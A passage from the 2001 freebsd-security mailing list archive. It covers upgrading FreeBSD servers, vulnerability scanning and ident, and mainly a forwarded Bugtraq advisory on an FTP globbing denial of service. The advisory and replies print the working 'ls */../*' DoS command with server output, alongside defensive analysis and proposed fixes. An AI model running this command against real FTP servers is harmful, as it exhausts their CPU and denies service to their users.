From: Marc Rogers <marcr@shady.org>
To: freebsd-security@FreeBSD.ORG
Subject: Re: What's vunerable?
Message-ID: <20010316102302.V10016@shady.org>
References: <3AB1DBF9.C721E3D6@vianetworks.co.uk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.4i
In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>; from peterm@vianetworks.co.uk on Fri, Mar 16, 2001 at 09:25:13AM +0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
on the subject of updating a large number of freebsd boxes...
I just thought I would throw my twopence worth in, as while working for
a number of entirely freebsd based isps a few years ago, I had to deal
with exactly this problem.
Making world in situ on production servers is a game of russian roulette.
Most fo the time it works, but the older the starting version, the harder
it becomes. The safest way to synchronise a large number of boxes
(in my view) is to play a shell game with them. Take one clean box and
install freebsd and whatever base software you need. Then migrate the
customer data from one of your older boxes onto this new one. When you are
comfortable that the new box can replace the old one completely, shut down
the old one and bring up the interfaces on the replacement. Next take the
box you just replaced, and after backing everything up, reinstall the os.
Use this box to upgrade another. and so on.
When you get the hang of it, it becomes quite a swift process. Please ensure
that you do back everything up though, as I can guaruntee you will forget
something.
If you need any futher help, feel free to mail me.
Marc Rogers
Head of Network Operations & Security
EDC Group
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 2:26:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mine.kame.net (kame195.kame.net [203.178.141.195])
by hub.freebsd.org (Postfix) with ESMTP id 9D2BF37B719
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 02:26:14 -0800 (PST)
(envelope-from sakane@ydc.co.jp)
Received: from localhost ([3ffe:501:481d:1000:260:1dff:fe21:f766])
by mine.kame.net (8.11.1/3.7W) with ESMTP id f2GAR6Y76773;
Fri, 16 Mar 2001 19:27:07 +0900 (JST)
To: kris@obsecurity.org
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: What's vunerable?
In-Reply-To: Your message of "Fri, 16 Mar 2001 01:40:04 -0800"
<20010316014004.A86953@mollari.cthul.hu>
References: <20010316014004.A86953@mollari.cthul.hu>
X-Mailer: Cue version 0.6 (010224-1625/sakane)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Message-Id: <20010316192556Q.sakane@ydc.co.jp>
Date: Fri, 16 Mar 2001 19:25:56 +0900
From: Shoichi Sakane <sakane@ydc.co.jp>
X-Dispatcher: imput version 20000228(IM140)
Lines: 8
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
> > What I really need to know is what vulnerabilities exist on each box -
> > so that I can present the boss with a risk assessment, and make him
> > decide if the box stays as is, or gets a make world.
> Read the advisories.
why don't the maintener of the ports of openssh make upgrade its version ?
current version of the ports is openssh 2.2.0 which has some vulnerability.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 3:10:25 2001
Delivered-To: freebsd-security@freebsd.org
Received: from daphne.unloved.org (daphne.unloved.org [62.58.62.165])
by hub.freebsd.org (Postfix) with ESMTP id DDD6E37B719
for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 03:10:21 -0800 (PST)
(envelope-from ashp@unloved.org)
Received: by daphne.unloved.org (Postfix, from userid 1001)
id AB7D31176B; Fri, 16 Mar 2001 12:11:58 +0100 (CET)
Date: Fri, 16 Mar 2001 12:11:58 +0100
From: Ashley Penney <ashp@unloved.org>
To: freebsd-security@freebsd.org
Subject: Re: What's vunerable?
Message-ID: <20010316121158.A17693@daphne.unloved.org>
Mail-Followup-To: Ashley Penney <ashp@unloved.org>,
freebsd-security@freebsd.org
References: <3AB1DBF9.C721E3D6@vianetworks.co.uk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>; from peterm@vianetworks.co.uk on Fri, Mar 16, 2001 at 09:25:13AM +0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Fri, Mar 16, 2001 at 09:25:13AM +0000, Peter McGarvey said:
> I've just inherited several FreeBSD boxes. The versions range from
> 3.2_RELEASE to 4.1_RELEASE.
>
> On the BSD boxes I already maintain I cvsup and make world on a monthly
> basis - or as soon as I see a CERT advisory that I know relates to
> something that can bite. But the inherited boxes need a lot of work,
> and I cannot guarantee to "The Powers That Be" that a make world wont
> break the box.
>
> What I really need to know is what vulnerabilities exist on each box -
> so that I can present the boss with a risk assessment, and make him
> decide if the box stays as is, or gets a make world.
>
> So any advice anyone can give me, on how to find out what's vunerable
> with any particular FreeBSD version, would be greatly appreciated.
One suggestion I would have is to pop to www.nessus.org, and use the
scanner they provide. It can output reports in HTML and so forth, with
pretty graphics for PHB's. However, it can sometimes trigger false
alarms so I'd run it against the boxes, and check the results by hand.
[I've found this very useful when I suddenly get thrown into 500 boxes,
all running different versions of OS's.]
--
"I think our users are a lazy bunch of elitist snobs when it comes to
advocacy." -- Poul-Henning Kemp on the FreeBSD community.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 4:45: 4 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13])
by hub.freebsd.org (Postfix) with SMTP id DCC9037B718
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 04:44:57 -0800 (PST)
(envelope-from roam@orbitel.bg)
Received: (qmail 22337 invoked by uid 1000); 16 Mar 2001 12:44:17 -0000
Date: Fri, 16 Mar 2001 14:44:17 +0200
From: Peter Pentchev <roam@orbitel.bg>
To: Shoichi Sakane <sakane@ydc.co.jp>
Cc: kris@obsecurity.org, freebsd-security@FreeBSD.ORG
Subject: Re: What's vunerable?
Message-ID: <20010316144417.A22302@ringworld.oblivion.bg>
Mail-Followup-To: Shoichi Sakane <sakane@ydc.co.jp>,
kris@obsecurity.org, freebsd-security@FreeBSD.ORG
References: <20010316014004.A86953@mollari.cthul.hu> <20010316192556Q.sakane@ydc.co.jp>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010316192556Q.sakane@ydc.co.jp>; from sakane@ydc.co.jp on Fri, Mar 16, 2001 at 07:25:56PM +0900
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Fri, Mar 16, 2001 at 07:25:56PM +0900, Shoichi Sakane wrote:
> > > What I really need to know is what vulnerabilities exist on each box -
> > > so that I can present the boss with a risk assessment, and make him
> > > decide if the box stays as is, or gets a make world.
>
> > Read the advisories.
>
> why don't the maintener of the ports of openssh make upgrade its version ?
> current version of the ports is openssh 2.2.0 which has some vulnerability.
The version of OpenSSH in the ports tree is not plain 2.2.0, but 2.2.0
'port revision' 2. The 'port revision' was bumped twice to indicate
important security fixes. The 'some vulnerability' you are referring to
is probably the Bleichenbacher attack, which affected nearly all SSH
servers at the time; a fix was prompty added to the FreeBSD port.
G'luck,
Peter
--
If I had finished this sentence,
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 4:51:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13])
by hub.freebsd.org (Postfix) with SMTP id CE84137B718
for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 04:51:21 -0800 (PST)
(envelope-from roam@orbitel.bg)
Received: (qmail 22441 invoked by uid 1000); 16 Mar 2001 12:50:39 -0000
Date: Fri, 16 Mar 2001 14:50:39 +0200
From: Peter Pentchev <roam@orbitel.bg>
To: Lukasz Pawlik <freebsd@btk.za.net>
Cc: freebsd-security@freebsd.org
Subject: Re: Invalid hostname
Message-ID: <20010316145039.B22302@ringworld.oblivion.bg>
Mail-Followup-To: Lukasz Pawlik <freebsd@btk.za.net>,
freebsd-security@freebsd.org
References: <20010316103954.A24855@btk.za.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010316103954.A24855@btk.za.net>; from freebsd@btk.za.net on Fri, Mar 16, 2001 at 10:39:54AM +0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Fri, Mar 16, 2001 at 10:39:54AM +0000, Lukasz Pawlik wrote:
> Hello,
> I'd like to ask for a little help. I dont understand one record
> which is printed by last.
> ash ttyp2 invalid hostname Ndz 11 Mar 19:07 - 20:13 (01:06)
>
> What the 'invalid hostname' is? If DNS failed, why there is no ip?
> Can someone explain me?
> Lukasz
'invalid hostname' is what /usr/bin/login puts into the wtmp record,
when it (login) is started with an '-h hostname' argument, and then
the DNS lookup of the specified hostname fails. Thus, login cannot
put an IP address there, 'cause it's just the IP address lookup that
failed :)
The fun question is how did login get started with an invalid hostname
passed; how did the user in question log in to the machine? Apparently
it was over the network, was it a telnet, SSH or some other kind of session?
G'luck,
Peter
--
If there were no counterfactuals, this sentence would not have been paradoxical.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 5:13: 9 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.interchange.ca (ns.interchange.ca [216.126.79.2])
by hub.freebsd.org (Postfix) with ESMTP id 0019437B718
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 05:13:06 -0800 (PST)
(envelope-from michael@fastmail.ca)
Received: by mail.interchange.ca (Fastmailer, from userid 555)
id 1B68120AE; Fri, 16 Mar 2001 08:12:33 -0500 (EST)
MIME-Version: 1.0
Message-Id: <3AB21141.0000E1.28395@frodo.searchcanada.ca>
Content-Type: Multipart/Mixed;
boundary="------------Boundary-00=_XOKA015BHVCNTT4D7TH0"
To: freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service
Cc: bright@wintelcom.net
From: "Michael Richards" <michael@fastmail.ca>
X-Fastmail-IP: 24.43.130.237
Date: Fri, 16 Mar 2001 08:12:33 -0500 (EST)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
--------------Boundary-00=_XOKA015BHVCNTT4D7TH0
Content-Type: Text/Plain
Content-Transfer-Encoding: 7bit
Normally when I write code to sanatise a user entered path with glob
or .. in it I process the string to remove any directory name
succeeded by a '/..'
There is of course a problem with this generalised optimisation.
/nonexistant/../existant/ succeeds where it shouldn't.
However, when you apply it to a glob, it is implied that '*/..' must
exist. In this case, I believe it is valid to remove any iteration
of '*/..' from the string. This may still, however leave a crafty
combination of '?' to cause the same problem.
-Michael
>> Actually I think this highly depends on HOW MANY files and
>> directories FTPD can access.
>>
>> I didn't see any damage with a jailed FTPD with 1 directoy and 2
>> files.
>
> The only reason you didn't see a problem was because you had
> only one directory.
>
> The DoS works via a simple mechanism.
>
> if you have a dir with two directories in it 'a' and 'b'
>
> */../ -> a/.. b/..
> */../*/.. -> a/../a/.. a/../b/.. b/../a/.. b/../b/..
>
> basically for each ../*/ you do a power N where N is the number
> of directories.
_________________________________________________________________
http://fastmail.ca/ - Fast Free Web Email for Canadians
--------------Boundary-00=_XOKA015BHVCNTT4D7TH0--
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 5:52:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2])
by hub.freebsd.org (Postfix) with ESMTP id 8A08037B718
for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 05:52:37 -0800 (PST)
(envelope-from lee@kechara.net)
Received: from area57 (lan-fw.kechara.net [62.49.139.3])
by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id PAA16561
for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 15:02:57 GMT
Message-Id: <200103161502.PAA16561@mailgate.kechara.net>
Date: Fri, 16 Mar 2001 13:56:08 -0000
To: freebsd-security@freebsd.org
From: Lee Smallbone <lee@kechara.net>
Subject: Re: Multiple vendors FTP denial of service (fwd)
Reply-To: lee@kechara.net
Organization: Kechara Internet
X-Mailer: Opera 5.02 build 856a
X-Priority: 3 (Normal)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii";
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
4.2-RELEASE, regular user, regular home directory
(snipped)
/../www/62.49.139.3_3-year.png
www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www
/../www/62.49.139.3_3.html
www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www
/../www/btareshit.png
www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www
/../www/62.49.139.3_3.old
226 Transfer complete.
ftp: 5740 bytes received in 0.11Seconds 52.66Kbytes/sec.
ftp>
15/03/2001 22:21:16, Attila Nagy <bra@fsn.hu> wrote:
>FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
>-STABLE.
>
>---------- Forwarded message ----------
>Date: Thu, 15 Mar 2001 09:34:09 +0100
>From: "Frank DENIS (Jedi/Sector One)" <j@4U.NET>
>To: BUGTRAQ@SECURITYFOCUS.COM
>Subject: Multiple vendors FTP denial of service
>
>- Proftpd built-in 'ls' command has a globbing bug that allows remote
>denial-of-service.
>
> Here's a simple exploit, tested on the Proftpd site :
>
>$ ftp ftp.proftpd.org
>...
>Name (ftp.proftpd.org:j): ftp
>...
>230 Anonymous access granted, restrictions apply.
>Remote system type is UNIX.
>Using binary mode to transfer files.
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>227 Entering Passive Mode (216,10,40,219,4,111).
>421 Service not available, remote server timed out. Connection closed
>
> That command takes 100% CPU time on the server. It can lead into an easy
>DOS even if few remote simultanous connections are allowed.
>
> Other FTP servers may be concerned as well. Here are various tries :
>
>- NetBSD FTP showed the same behavior than Proftpd :
>
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>200 EPRT command successful.
>(long delay)
>421 Service not available, remote server timed out. Connection closed
>
>So NetBSD-ftpd 20000723a may also consume 100% cpu time, resulting in a
>possible DOS. Other BSD FTP may be affected as well.
>
>- Microsoft FTP Service (Version 5.0) seems also confused by the command :
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>500 'EPSV': command not understood
>227 Entering Passive Mode (207,46,133,140,4,223).
>200 PORT command successful.
>150 Opening ASCII mode data connection for file list.
>(very long delay... nothing happens...)
>
>- Publicfile refuses the command :
>
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>227 =131,193,178,181,97,222
>550 Sorry, I can't open that file: file does not exist.
>
>- Wu-FTPd 2.6.1 is not vulnerable. Only the result of 'ls *' is computed and
>displayed.
>
>- PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard
>expression to *" and the 'ls *' output.
>
>
> Maintainers of vulnerable servers have been warned of this bug.
>
>--
> -=- Frank DENIS aka Jedi/Sector One < spam@jedi.claranet.fr > -=-
> LINAGORA SA (Paris, France) : http://www.linagora.com
>
>
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message
>
--
Lee Smallbone
Kechara Internet
lee@kechara.net
www.kechara.net
Tel: (01243) 869 969
Fax: (01243) 866 685
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 5:59:23 2001
Delivered-To: freebsd-security@freebsd.org
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163])
by hub.freebsd.org (Postfix) with ESMTP id A88D437B719
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 05:59:20 -0800 (PST)
(envelope-from phk@critter.freebsd.dk)
Received: from critter (localhost [127.0.0.1])
by critter.freebsd.dk (8.11.3/8.11.3) with ESMTP id f2GDxH111551;
Fri, 16 Mar 2001 14:59:17 +0100 (CET)
(envelope-from phk@critter.freebsd.dk)
To: lee@kechara.net
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service (fwd)
In-Reply-To: Your message of "Fri, 16 Mar 2001 13:56:08 GMT."
<200103161502.PAA16561@mailgate.kechara.net>
Date: Fri, 16 Mar 2001 14:59:17 +0100
Message-ID: <11549.984751157@critter>
From: Poul-Henning Kamp <phk@critter.freebsd.dk>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
In message <200103161502.PAA16561@mailgate.kechara.net>, Lee Smallbone writes:
>4.2-RELEASE, regular user, regular home directory
>
>(snipped)
>
>/../www/62.49.139.3_3-year.png
>www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www
>/../www/62.49.139.3_3.html
>www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www
>/../www/btareshit.png
>www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www
>/../www/62.49.139.3_3.old
>226 Transfer complete.
>ftp: 5740 bytes received in 0.11Seconds 52.66Kbytes/sec.
>ftp>
Now, try to create a 'foo' directory next to your 'www' directory...
--
Poul-Henning Kamp | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG | TCP/IP since RFC 956
FreeBSD committer | BSD since 4.3-tahoe
Never attribute to malice what can adequately be explained by incompetence.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 6:31: 3 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gyw.com (gyw.com [209.55.67.177])
by hub.freebsd.org (Postfix) with ESMTP id 90AEE37B719
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 06:30:59 -0800 (PST)
(envelope-from tjk@tksoft.com)
Received: from smtp3.tksoft.com (smtp3.tksoft.com [192.168.50.56] (may be forged))
by gyw.com (8.8.8/8.8.8) with ESMTP id GAA26051;
Fri, 16 Mar 2001 06:47:31 -0800
Received: (from tjk@tksoft.com)
by smtp3.tksoft.com (8.8.8/8.8.8) id GAA17664;
Fri, 16 Mar 2001 06:17:49 -0800
From: "tjk@tksoft.com" <tjk@tksoft.com>
Message-Id: <200103161417.GAA17664@smtp3.tksoft.com>
Subject: Re: Multiple vendors FTP denial of service (fwd)
To: bright@wintelcom.net (Alfred Perlstein)
Date: Fri, 16 Mar 2001 06:17:48 -0800 (PST)
Cc: apina@infolink.com.br (Antonio Carlos Pina),
freebsd-security@FreeBSD.ORG
In-Reply-To: <20010315155234.G29888@fw.wintelcom.net> from "Alfred Perlstein" at Mar 15, 2001 03:52:34 PM
X-Info: None
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
One solution I can think of is to use a hash table for interpreting the
glob results, and count duplicate listings of directories/files. Then
truncate the results if the duplicates exceed x times valid keys in
the hash (or report an error, or both.) I don't know if there is a set
of hash routines available, but if not, one could use a tree (tsearch)
to accomplish the same.
All this depends on the file listings being first converted to the
shortest path to the file. I.e. "/etc/../etc/yadayada.txt" would become
"/etc/yadayada.txt" before being added to the list. I presume this is
already done.
The other solution is to always reduce the original path to its shortest
form, to avoid recursive listings of directories. Sounds a simpler and
faster approach. If only someone's got foolproof logic to accomplish
this. Removing certain strings might work.
Sounds like frustrating extra work, but since there is a problem, what
else are you going to do?
Troy
>
> * Antonio Carlos Pina <apina@infolink.com.br> [010315 15:17] wrote:
> > Hello,
> >
> > Actually I think this highly depends on HOW MANY files and
> > directories FTPD can access.
> >
> > I didn't see any damage with a jailed FTPD with 1 directoy and 2
> > files.
>
> The only reason you didn't see a problem was because you had
> only one directory.
>
> The DoS works via a simple mechanism.
>
> if you have a dir with two directories in it 'a' and 'b'
>
> */../ -> a/.. b/..
> */../*/.. -> a/../a/.. a/../b/.. b/../a/.. b/../b/..
>
> basically for each ../*/ you do a power N where N is the number
> of directories.
>
> How could this be fixed? I think it's somewhat simple,
> have glob() maintain a truncated version of paths and
> make sure that any collisions are detected.
>
> Of course this is only speculation since I haven't looked
> at the code.
>
> --
> -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 8:39:13 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mars.entic.net (mars.entic.net [63.125.62.132])
by hub.freebsd.org (Postfix) with ESMTP id 0B09637B718
for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 08:39:11 -0800 (PST)
(envelope-from aj@entic.net)
Received: (qmail 18072 invoked by uid 100); 16 Mar 2001 16:39:07 -0000
Received: from localhost (sendmail-bs@127.0.0.1)
by localhost with SMTP; 16 Mar 2001 16:39:07 -0000
Date: Fri, 16 Mar 2001 08:39:07 -0800 (PST)
From: Anil Jangity <aj@entic.net>
To: <freebsd-security@freebsd.org>
Subject: Re: Multiple vendors FTP denial of service
In-Reply-To: <20010315215913.A70990@mollari.cthul.hu>
Message-ID: <Pine.BSF.4.33.0103160832130.17245-100000@mars.entic.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Kris/All,
FTPD is run as root (atleast on my machine). I don't want to limit root
resources, since I am not sure exactly what a good ball park figure for
root would be...
I looked in ftpd(8) for some way to make it run as another user (atleast
after it starts up) but no luck.
So, my question is, how do you propose we resource limit ftpd as you
suggest via login.conf?
Thanks
Anil
@ I'm pretty sure (but haven't tested) that resource limits will prevent
@ this problem. Your ftpd shouldn't be using large amount of memory
@ under normal operating procedures, so you can set those to reasonable
@ values and not suffer any ill effects.
@
@ Kris
@
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 8:46:50 2001
Delivered-To: freebsd-security@freebsd.org
Received: from castle.dreaming.org (castle.dreaming.org [216.221.214.170])
by hub.freebsd.org (Postfix) with ESMTP id 8A91A37B719
for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 08:46:46 -0800 (PST)
(envelope-from mit@mitayai.net)
Received: (from root@localhost)
by castle.dreaming.org (8.11.3/8.11.2) id f2GGkeu37698;
Fri, 16 Mar 2001 11:46:40 -0500 (EST)
(envelope-from mit@mitayai.net)
Received: from cr592943a (cr592943-a.bloor1.on.wave.home.com [24.156.38.199])
by castle.dreaming.org (8.11.3/8.11.2av) with SMTP id f2GGkca37690;
Fri, 16 Mar 2001 11:46:38 -0500 (EST)
(envelope-from mit@mitayai.net)
From: "Will Mitayai Keeso Rowe" <mit@mitayai.net>
To: "Peter McGarvey" <peterm@vianetworks.co.uk>,
"freebsd-security" <freebsd-security@freebsd.org>
Subject: RE: What's vunerable?
Date: Fri, 16 Mar 2001 11:43:40 -0500
Message-ID: <NEBBIEGPMLMKDBMMICFNEEFNEMAA.mit@mitayai.net>
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Importance: Normal
X-Virus-Scanned: by AMaViS perl-10
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
inherited? need a lot of work? then assume everything is vulnerable due to
ex-employees, past trojan horses, bad administrative practices and
configurations, etc.
go through the FreeBSD Security Advisories at
http://www.freebsd.org/security/#adv for alkl the listed advisories.
make sure you pay attention to all the installed packages, ports, and
user-installed third-party stuff.
-Mit
:-----Original Message-----
:From: owner-freebsd-security@FreeBSD.ORG
:[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Peter McGarvey
:Sent: March 16, 2001 04:25 AM
:To: freebsd-security
:Subject: What's vunerable?
:
:
:I've just inherited several FreeBSD boxes. The versions range from
:3.2_RELEASE to 4.1_RELEASE.
:
:On the BSD boxes I already maintain I cvsup and make world on a monthly
:basis - or as soon as I see a CERT advisory that I know relates to
:something that can bite. But the inherited boxes need a lot of work,
:and I cannot guarantee to "The Powers That Be" that a make world wont
:break the box.
:
:What I really need to know is what vulnerabilities exist on each box -
:so that I can present the boss with a risk assessment, and make him
:decide if the box stays as is, or gets a make world.
:
:So any advice anyone can give me, on how to find out what's vunerable
:with any particular FreeBSD version, would be greatly appreciated.
:
:--
:TTFN, FNORD
:
:Peter McGarvey
:System Administrator
:Network Operations, VIA Networks UK
:
:To Unsubscribe: send mail to majordomo@FreeBSD.org
:with "unsubscribe freebsd-security" in the body of the message
:
:
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 8:54:45 2001
Delivered-To: freebsd-security@freebsd.org
Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220])
by hub.freebsd.org (Postfix) with ESMTP id 4996537B718
for <security@freebsd.org>; Fri, 16 Mar 2001 08:54:42 -0800 (PST)
(envelope-from wes@softweyr.com)
Received: from [127.0.0.1] (helo=softweyr.com ident=4a656828bf96df23684bddfc4d0922ae)
by homer.softweyr.com with esmtp (Exim 3.16 #1)
id 14dxS9-0000Ko-00; Fri, 16 Mar 2001 09:51:50 -0700
Message-ID: <3AB244A5.315DFD16@softweyr.com>
Date: Fri, 16 Mar 2001 09:51:49 -0700
From: Wes Peters <wes@softweyr.com>
Organization: Softweyr LLC
X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Nate Williams <nate@yogotech.com>
Cc: Adam Laurie <adam@algroup.co.uk>,
Ronan Lucio <ronan@melim.com.br>, security@FreeBSD.ORG
Subject: Re: Port 113
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com>
<099801c0ad7c$75b63800$2aa8a8c0@melim.com.br>
<15025.5630.472269.543769@nomad.yogotech.com>
<3AB1261F.23B8BE75@algroup.co.uk> <15025.10176.676792.32675@nomad.yogotech.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Nate Williams wrote:
>
> > > > Could anybody say me when I need to allow the port 113
> > > > in the firewall?
> > >
> > > *Need* form auth is a strong word. However, it does tend to speed up
> > > email transfers is you enable a version that always responds true.
> > >
> > > So, any external SMTP servers you have *should* have this port enabled.
> > >
> > > > What services use this port?
> > >
> > > I know that SMTP uses it, and I believe that ftpd uses it, and I believe
> > > irc also uses it.
> >
> > smtp does not need to use it - you can achieve the same speedy transfers
> > by telling your smtp server not to bother. e.g. for sendmail:
> >
> > O Timeout.ident=0s
>
> My local sendmail doesn't use *my* ident server, but remote sendmail
> servers use *my* ident server, so using ident locally speeds up mail
> transfers *to* my host.
>
> I certainly don't use ident for local email. :)
To quote a relatively unknown identd server, "Fools trust ident!"
--
"Where am I, and what am I doing in this handbasket?"
Wes Peters Softweyr LLC
wes@softweyr.com http://softweyr.com/
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 9:57: 7 2001
Delivered-To: freebsd-security@freebsd.org
Received: from silver.teardrop.org (silver.teardrop.org [205.181.101.128])
by hub.freebsd.org (Postfix) with ESMTP id 8368837B71D
for <security@FreeBSD.ORG>; Fri, 16 Mar 2001 09:57:00 -0800 (PST)
(envelope-from snow@teardrop.org)
Received: (from snow@localhost)
by silver.teardrop.org (8.11.2/8.11.1) id f2GHtWC66126;
Fri, 16 Mar 2001 12:55:33 -0500 (EST)
(envelope-from snow@teardrop.org)
Date: Fri, 16 Mar 2001 12:55:32 -0500
From: James Snow <snow@teardrop.org>
To: Kris Kennaway <kris@obsecurity.org>
Cc: Brooks Davis <brooks@one-eyed-alien.net>,
Alex Popa <razor@ldc.ro>, security@FreeBSD.ORG
Subject: Re: 4.3-BETA, sshd.core found in root directory.
Message-ID: <20010316125532.A65814@teardrop.org>
References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu> <20010312152215.A94640@mollari.cthul.hu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010312152215.A94640@mollari.cthul.hu>; from kris@obsecurity.org on Mon, Mar 12, 2001 at 03:22:15PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Mon, Mar 12, 2001 at 03:22:15PM -0800, Kris Kennaway wrote:
> On Mon, Mar 12, 2001 at 02:57:54PM -0800, Brooks Davis wrote:
> > On Tue, Mar 13, 2001 at 12:48:13AM +0200, Alex Popa wrote:
> > > I am not really sure what this means (could mean a lot of things,
